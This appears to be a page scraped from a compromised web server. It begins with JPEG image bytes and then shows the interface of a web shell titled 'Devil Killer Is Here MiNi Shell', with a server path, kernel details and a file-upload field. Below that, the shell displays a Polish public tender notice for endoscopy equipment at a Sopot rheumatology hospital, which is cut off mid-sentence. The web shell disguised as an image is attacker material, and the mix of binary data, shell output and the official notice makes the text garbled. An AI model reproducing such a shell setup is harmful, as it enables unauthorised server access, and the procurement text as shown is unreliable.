JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210802/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210802/0013363402-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00133634 z dnia 2021-08-02</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa i montaż sprzętu oraz wyposażenia med. na potrzeby realizacji projektu pn.: „Utworzenie Centrum Op. Geriatrycznej w PCR im. dr Jadwigi Titz – Kosko w Sopocie Sp. z o.o.” dofinansowanego z EFRR </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Pomorskie Centrum Reumatologiczne im. dr Jadwigi Titz - Kosko w Sopocie Sp. z o. o.</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 192587795</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Grunwaldzka 1-3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Sopot</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">81-759</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL633 - Trójmiejski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">58 5557528</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@pcrsopot.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.pcrsopot.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Spółka prawa handlowego </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa i montaż sprzętu oraz wyposażenia med. na potrzeby realizacji projektu pn.: „Utworzenie Centrum Op. Geriatrycznej w PCR im. dr Jadwigi Titz – Kosko w Sopocie Sp. z o.o.” dofinansowanego z EFRR </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-914c38c1-f119-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00133634</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-08-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> W poz. 1 realizacja z udziałem śr unijnych na podst um nr UDARPPM. 07.01.01-22-0001/17-00 ze zm, zawartej 13 .04.17 r. o dofinansowanie Projektu: Utworzenie COG w PCR im dr J. Titz – Kosko w Sopocie sp z o.o w ramach RPO Woj Pom na lata 2014–2020, Osi Priorytetowej 7 Zdrowie, Działania 7.1 Zasoby ochr. zdrowia, Poddziałania 7.1.1 Zasoby ochr. zdrowia - mech. ZIT współfin z EFRR. Poz. 2 śr własne </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/pcr_sopot <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/pcr_sopot</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Postępowanie prowadzone jest w języku polskim przy użyciu środków komunikacji elektronicznej<br/>w formie elektronicznej za pośrednictwem platformazakupowa.pl (dalej jako „Platforma”) pod<br/>adresem:https://platformazakupowa.pl/pn/pcr_sopot tj. oferta oraz wszelkie dokumenty<br/>elektroniczne,oświadczenia, wnioski lub elektroniczne kopie dokumentów, oświadczeń lub wniosków, o<br/>których mowa w SWZ, składane są przez Wykonawcę za pośrednictwem bezpłatnej dla Wykonawców<br/>Platformy. 2Ofertę wraz z oświadczeniem o niepodleganiu wykluczeniu i spełnianiu warunków w<br/>postępowaniu,należy przesłać w formie elektronicznej podpisane elektronicznym podpisem zaufanym<br/>lub postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym pod rygorem<br/>nieważności poprzez „Formularz” umieszczony na Platformie Zakupowej na stronie postępowania,<br/>gdzie Wykonawca załącza ofertę wraz z załącznikami oraz ewentualnie dokumenty stanowiące<br/>tajemnicę przedsiębiorstwa Zamawiający nie dopuszcza składania ofert z wykorzystaniem opcji<br/>„Wyślij wiadomość”. W przypadku awarii w działaniu Platformy:<br/>https://platformazakupowa.pl/pn/pcr_sopotZamawiający również dopuszcza komunikację za pomocą<br/>poczty elektronicznej (z wyłączeniem składania oferty, dla której jedynym dopuszczalnym sposobem<br/>złożenia jest przesłanie jej za pośrednictwem Platformy). W takim przypadku Wykonawca zobowiązany<br/>jest przesłać dokumenty na adres: przetargi@pcrsopot.pl 3 Komunikacja między Zamawiającym, a<br/>wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane<br/>są w postaci elektronicznej za pośrednictwem Platformy i formularza „Wyślij wiadomość do<br/>zamawiającego”, przy czym dokumenty przesłane przez Wykonawcę (w szczególności stanowiące<br/>Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy<br/>oświadczenie woli) muszą być podpisane elektronicznym podpisem kwalifikowanym, podpisem<br/>zaufanym lub podpisem osobistym przez osobę upoważnioną. Za datę przekazania (wpływu)<br/>oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich przesłania za<br/>pośrednictwem Platformy poprzez kliknięcie przycisku „Wyślij wiadomość do zamawiającego” po<br/>których pojawi się komunikat, że wiadomość została wysłana do zamawiającego. 4 Zamawiający będzie<br/>przekazywał wykonawcom informacje droga elektroniczną za pośrednictwem Platformy. Informacje<br/>dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia ofert<br/>Zamawiający będzie zamieszczał na platformie w sekcji“Komunikaty”. Korespondencja, której zgodnie<br/>z obowiązującymi przepisami adresatem jest konkretny wykonawca, będzie przekazywana drogą<br/>elektroniczną za pośrednictwem Platformy do konkretnego wykonawcy. 5<br/>Zamawiający określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na Platformie<br/>w dokumencie SWZ 6 Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia<br/>publicznego:a) akceptuje warunki korzystania z platformazakupowa.pl określone w Regulaminie<br/>zamieszczonym na stronie internetowej pod linkiem w zakładce „Regulamin"oraz uznaje go za<br/>wiążący,b) zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej pod linkiem:<br/>https://drive.google.com/file/d/1Kd1DttbBeiNWt4q4slS4t76lZVKPbkyD/view 7Zamawiający informuje,<br/>że instrukcje korzystania z Platformy dotyczące w szczególności logowania,składania wniosków o<br/>wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym<br/>postępowaniu przy użyciu Platformy znajdują się w zakładce „Instrukcje dla Wykonawców" na stronie<br/>internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje8 Z uwagi na ograniczenie<br/>liczby znaków szczegółowe informacje znajdują się w SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Na podstawie art. 13 ust. 1 i 2 rozporządzenia<br/>ParlamentuEuropejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób<br/>fizycznych wzwiązku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich<br/>danych orazuchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L<br/>119 z04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że: a. Administratorem danych<br/>osobowychWykonawcy, a w wypadku Wykonawców będących osobami prawnymi lub<br/>jednostkamiorganizacyjnymi - w stosunku do danych osobowych zidentyfikowanych lub możliwych<br/>dozidentyfikowania osób fizycznych ujawnionych przez Wykonawcę jest Zamawiający -<br/>PomorskieCentrum Reumatologiczne im. dr Jadwigi Titz – Kosko w Sopocie Spółka z o.o. z siedzibą w<br/>Sopocie,ul. Grunwaldzka 1-3, 81-759 Sopot, wpisana do rejestru przedsiębiorców prowadzonego przez<br/>SądRejonowy Gdańsk – Północ w Gdańsku, Wydział VIII Gospodarczy Krajowego Rejestru Sądowego<br/>podnumerem KRS 0000684944, nr NIP 585-14-79-028, REGON: 192587795, tel. (58) 555-75-20,<br/>tel./fax.(58) 551-14-26.b. Administrator wyznaczył Inspektora Ochrony Danych, z którym można<br/>sięskontaktować pod adresem e-mail: iod@pcrsopot.pl lub na wskazany powyżej adres<br/>AdministratoraDanych Osobowych. Z Inspektorem Ochrony Danych Osobowych należy kontaktować<br/>się wewszystkich sprawach związanych z przetwarzaniem danych osobowych oraz z korzystaniem<br/>przezWykonawcę lub osoby, których dane osobowe zostały ujawnione przez Wykonawcę z<br/>prawzwiązanych z przetwarzaniem i ochroną danych osobowych. c. Dane osobowe Wykonawcy lub<br/>daneosobowe osób ujawnione przez Wykonawcę będą wykorzystywane w celu<br/>przeprowadzeniapostępowania i udzielenia zamówienia publicznego na podstawie przepisów ustawy<br/>Prawo zamówieńpublicznych, oraz po udzieleniu zamówienia w celu zawarcia i realizacji umowy.<br/>Podstawąprzetwarzania tych danych jest art. 6 ust. 1 pkt b), c) i f) RODO. d. Podanie danych<br/>osobowych jestdobrowolne, ale niezbędne do przeprowadzenia postępowania i udzielenia zamówienia<br/>publicznego napodstawie ustawy Prawo zamówień publicznych oraz realizacji umowy w przypadku jej<br/>zawarcia.Konsekwencją niepodania tych danych będzie niemożliwość przeprowadzenia postępowania<br/>o udzielenie zamówienia publicznego, a następnie podpisania oraz realizacji zawartej zWykonawcąumowy i wynikających z niej obowiązków.e. Odbiorcami danych osobowych Wykonawcy<br/>lub danychosobowych osób ujawnionych przez Wykonawcę będą: Zamawiający, osoby lub podmioty,<br/>którymudostępniona zostanie dokumentacja postępowania w oparciu o art. 18 ustawy Prawo<br/>zamówieńpublicznych, podmioty uprawione do sprawdzania lub kontroli działalności Zamawiającego, w<br/>tymuczestniczące w postępowaniach przewidzianych w ramach środków ochrony prawnej<br/>opisanychustawie Prawo zamówień publicznych, a w przypadku zawarcia z Wykonawcą umowy<br/>odbiorcamidanych będą także podmioty świadczące obsługę prawną Zamawiającego, podmioty<br/>świadczące najego rzecz usługi finansowo-księgowe oraz inne podmioty upoważnione na podstawie<br/>przepisówprawa, zwłaszcza uprawione do kontroli działalności Zamawiającego.f. Zamawiający nie ma<br/>zamiaruprzekazywać danych osobowych Wykonawcy lub danych osobowych osób ujawnionych<br/>przezOgłoszenie nr 2021/BZP 00035299/01 z dnia 2021-04-192021-04-19 Biuletyn Zamówień<br/>Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na<br/>podstawie: art. 275 pkt 1 ustawy - DostawyWykonawcę do państwa trzeciego (poza teren<br/>Europejskiego Obszaru Gospodarczego) lub organizacji międzynarodowej, chyba że takie<br/>zobowiązanie będzie wynikać z przepisów prawa.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Dane osobowe Wykonawcy lub dane osobowe<br/>osóbujawnione przez Wykonawcę będą przetwarzane przez okres niezbędny do realizacji<br/>celuprzetwarzania w zakresie udzielenia zamówienia publicznego na podstawie ustawy Prawo<br/>zamówieńpublicznych oraz w przypadku zawarcia umowy przez okres realizacji umowy do momentu<br/>wygaśnięciaobowiązków przetwarzania danych wynikających z przepisów prawa, w tym wygaśnięcia<br/>roszczeń ocharakterze cywilnym i podatkowym. Następnie dane osobowe zostaną zarchiwizowane<br/>zgodnie zobowiązującymi przepisami prawa i przechowywane przez okres wymagany na podstawie<br/>przepisówokreślających postępowanie z materiałami archiwalnymi i inną dokumentacją. W<br/>przypadkuunieważnienia postępowania o udzielenie zamówienia publicznego dane osobowe<br/>Wykonawcy lubdane osobowe osób ujawnione przez Wykonawcę będą przetwarzane do momentu<br/>wygaśnięciaobowiązków przetwarzania danych wynikających z przepisów prawa, w tym przepisów<br/>dotyczącychokreślających postępowanie z materiałami archiwalnymi i inną dokumentacją.h. Dane<br/>osoboweWykonawcy lub dane osobowe osób ujawnione przez Wykonawcę nie będą przetwarzane w<br/>sposóbzautomatyzowany, w tym również w formie profilowania w rozumieniu art. 22 RODO.i.<br/>Wykonawca lubosoby, których dane osobowe zostały ujawnione przez Wykonawcę mają prawo<br/>dostępu do treściswoich danych osobowych oraz prawo ich sprostowania, ograniczenia ich<br/>przetwarzania, zzastrzeżeniem przepisów RODO, w tym art. 18 RODO, przenoszenia danych w<br/>przypadku gdy dane sąprzetwarzane na podstawie art. 6 ust. 1 pkt b) RODO, wniesienia sprzeciwu<br/>wobec przetwarzania wprzypadku gdy dane są przetwarzane na podstawie art. 6 ust. 1 pkt f) RODO<br/>oraz prawo do usunięciadanych osobowych z zastrzeżeniem art. 17 RODO.j. Wykonawca lub osoby,<br/>których dane osobowezostały ujawnione przez Wykonawcę mają prawo do wniesienia skargi do<br/>organu nadzorczego tj.:Prezesa Urzędu Ochrony Danych Osobowych, gdy uznają, iż przetwarzanie<br/>danych osobowych ichdotyczących narusza przepisy RODO.k. Skorzystanie przez osobę, której dane<br/>osobowe dotyczą, zuprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16<br/>rozporządzenia 2016/679, niemoże skutkować zmianą wyniku postępowania o udzielenie zamówienia<br/>ani zmianą postanowieńumowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą.l.<br/>W postępowaniu oudzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym<br/>mowa w art. 18 ust. 1rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do<br/>czasu zakończenia tego postępowania</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">8/TP/21</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Lp. Przedmiot zamówienia Ilość (szt.)<br/>1 Kolumna endoskopowa – tor wizyjny z wyposażeniem 1<br/>2 Dreny 2000 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33100000-1 - Urządzenia medyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">33162100-4 - Urządzenia używane na salach operacyjnych</p> <p class="mb-0">33168000-5 - Przyrządy do endoskopii, endochirurgii</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">42 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">95</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu i spełniają łącznie następujące warunki udziału w postępowaniu dotyczące posiadania: <br/>a)	zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>b)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>c)	sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>d)	zdolności technicznej lub zawodowej:<br/>Wykonawca spełni ten warunek jeśli wykaże należyte wykonanie, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanie, co najmniej dwóch dostaw:<br/> – urządzeń medycznych typu kolumna endoskopowa, <br/>w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie.<br/>2. Ocena spełnienia ww. warunków dokonana zostanie zgodnie z formułą „spełnia – nie spełnia”, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w Rozdziale VI.1 SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wszyscy Wykonawcy wraz z ofertą: 1) Wypełnione i<br/>podpisane oświadczenie o braku podstaw do wykluczenia i spełnieniu warunków udziału w<br/>postępowaniu aktualne na dzień składania ofert – Załącznik nr 4 do SWZ (wzór oświadczenia)<br/>Wykonawca, którego oferta została najwyżej oceniona:<br/>Informacja z Krajowego Rejestru Karnego w zakresie:<br/>a)art. 108 ust. 1 pkt 1 i 2 ustawy Pzp<br/>b)art. 108 ust. 1 pkt 4 ustawy Pzp, dotyczącej orzeczenia zakazu ubiegania się o zamówienie publiczne<br/>tytułem środka karnego,<br/>- sporządzona nie wcześniej niż 6 miesięcy przed jej złożeniem;<br/>5) Oświadczenie wykonawcy w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej<br/>samej grupy kapitałowej, w rozumieniu ustawy z dnia 16.02.2007 r. o ochronie konkurencji i<br/>konsumentów (Dz. U. z 2019 r. poz. 369), z innym wykonawcą, który złożył odrębną ofertę, ofertę<br/>częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o<br/>przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi<br/>przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu<br/>niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej - Załącznik nr 6 do SWZ<br/>Zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie<br/>zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy Pzp, wystawionego nie<br/>wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem podatków lub<br/>opłat wraz z zaświadczeniem zamawiający żąda złożenia dokumentów potwierdzających, że<br/>odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu<br/>albo przed upływem terminu składania ofert wykonawca dokonał płatności należnych podatków lub<br/>opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych<br/>należności; 7) Zaświadczenie albo inny dokument właściwej terenowej jednostki organizacyjnej<br/>Zakładu Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki<br/>terenowej Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie 